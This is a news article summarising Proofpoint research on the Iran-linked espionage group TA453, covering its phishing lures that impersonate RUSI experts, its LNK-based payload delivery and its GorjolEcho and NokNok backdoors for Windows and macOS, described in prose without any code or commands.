The cyberespionage group known as TA453, APT42, Charming Kitten, or Mint Sandstorm, which is believed to be associated with the Iranian government, has recently altered its payload delivery tactics. The group is notorious for its sophisticated and highly targeted phishing campaigns, often impersonating researchers, journalists, and policy analysts to gain the trust of their victims. However, the group was recently observed using a different method to deliver their malware.
Instead of using document template injections, TA453 has now started using LNK files as their payload delivery mechanism. LNK files are shortcut files on Windows that can contain scripting and command-line parameters, making them a powerful tool for attackers. This change in tactics is likely due to Microsoft’s crackdown on Office macros, which were previously a popular payload delivery method.
In a recent campaign monitored by security firm Proofpoint, TA453 impersonated a senior fellow from the Royal United Services Institute (RUSI) and reached out to a media contact at a US-based think tank. They asked the contact to review a draft for an upcoming paper on Iran’s global security context. To lend credibility to their request, the attackers even introduced three other experts from the institute who were supposedly working on the project. When they didn’t receive an immediate response, they followed up using one of these three personas to reinforce their request.
The email sent to the target contained a link that led to a Google Sheets document with a macro. The macro then redirected the victim to a Dropbox URL where a password-encrypted RAR archive was hosted. Inside the archive, there was a file called “Abraham Accords & MENA.pdf.lnk,” which was actually an LNK file disguised as a PDF. When the victim clicked on the LNK file, it launched a PowerShell payload that downloaded additional stages from a cloud hosting provider.
The PowerShell payload used a function called Borjol to open an encrypted HTTPS connection to a JavaScript application hosted on a subdomain. This application responded with data that was decrypted into a PowerShell backdoor named GorjolEcho. This backdoor ensured persistence across reboots and waited for commands from the attackers.
Interestingly, when the attackers realized that one of their targets had an Apple Mac machine instead of Windows, they developed a macOS version of their payload. The macOS payload, dubbed NokNok, was presented as an RUSI-related VPN client needed to access a shared folder. It installed a lightweight backdoor that was a port of GorjoEcho to macOS, with similar functionality and the ability to deploy additional modules.
The NokNok backdoor utilized bash scripts as its modules. These modules shared an encryption and base64 chunking routine for exfiltration. They also sent logs to a server controlled by TA453. While the researchers have identified some modules for both GorjoEcho and NokNok, they believe there are still undiscovered modules that further enhance the group’s capabilities.
This recent development highlights how TA453 is constantly evolving and adapting to changes in defense mechanisms. By switching to LNK files for payload delivery and developing a macOS version of their backdoor, the group demonstrates their willingness to experiment with new techniques to achieve their objectives. To mitigate the risk of falling victim to targeted phishing campaigns, organizations and individuals should remain vigilant and exercise caution when interacting with emails and attachments.